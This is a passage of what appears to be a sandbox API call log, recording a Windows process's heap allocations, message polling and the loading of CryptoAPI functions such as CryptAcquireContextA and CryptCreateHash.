hHeap=0x970000) returned 1 [0258.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0258.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0258.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0258.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0258.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0258.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0258.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0258.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0258.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0258.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0258.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0258.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0258.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0258.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0258.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0258.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0258.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0258.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0258.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0258.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0258.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0258.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0258.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0258.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0258.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0258.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0258.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0258.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0258.814] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0258.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0258.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0258.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0258.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0258.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0258.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0258.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0258.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0258.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0258.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0258.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0258.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0258.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0258.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0258.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0258.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0258.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0258.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0258.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0258.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0258.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0258.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0258.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0258.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0258.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0258.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0258.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0258.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0258.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0258.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0258.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0258.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0258.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0258.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0258.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0258.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0258.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0258.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0258.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0258.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0258.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0258.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0258.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0258.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0258.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0258.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0258.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0258.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0258.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0258.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0258.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0258.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0258.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0258.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0258.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0258.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0258.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0258.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0258.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0258.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0258.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0258.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0258.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0258.817] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0258.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0258.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0258.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0258.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b58 [0258.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0258.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0258.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0258.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b88 [0258.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0258.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0258.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0258.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0258.819] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0258.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0258.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0258.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b58 | out: hHeap=0x970000) returned 1 [0258.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0258.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0258.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0258.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0258.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0258.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0258.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0258.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0258.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0258.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0258.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0258.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0258.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0258.820] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0258.821] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.821] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.821] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0258.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c00 | out: hHeap=0x970000) returned 1 [0258.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0258.822] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0258.822] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0258.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0258.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0258.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0258.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0258.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0258.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0258.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0258.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0258.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0258.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0258.822] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0258.822] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0258.822] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.823] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0258.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e68 | out: hHeap=0x970000) returned 1 [0258.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0258.823] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0258.823] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0258.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0258.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0258.823] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0258.823] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.823] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.823] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.823] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0258.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a78 | out: hHeap=0x970000) returned 1 [0258.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0258.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.824] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0258.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0258.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0258.824] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0258.825] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0258.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e68 | out: hHeap=0x970000) returned 1 [0258.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0258.825] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0258.825] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0258.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0258.825] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0258.825] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0258.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ce0 | out: hHeap=0x970000) returned 1 [0258.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0258.825] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0258.825] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0258.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0258.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0258.825] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0258.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.826] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.826] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0258.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b90 | out: hHeap=0x970000) returned 1 [0258.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0258.826] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0258.826] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0258.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0258.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0258.826] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0258.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0258.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51658, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0258.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0258.827] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0258.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0258.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0258.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0258.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0258.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0258.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0258.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0258.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0258.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0258.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0258.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0258.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0258.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0258.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0258.827] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, 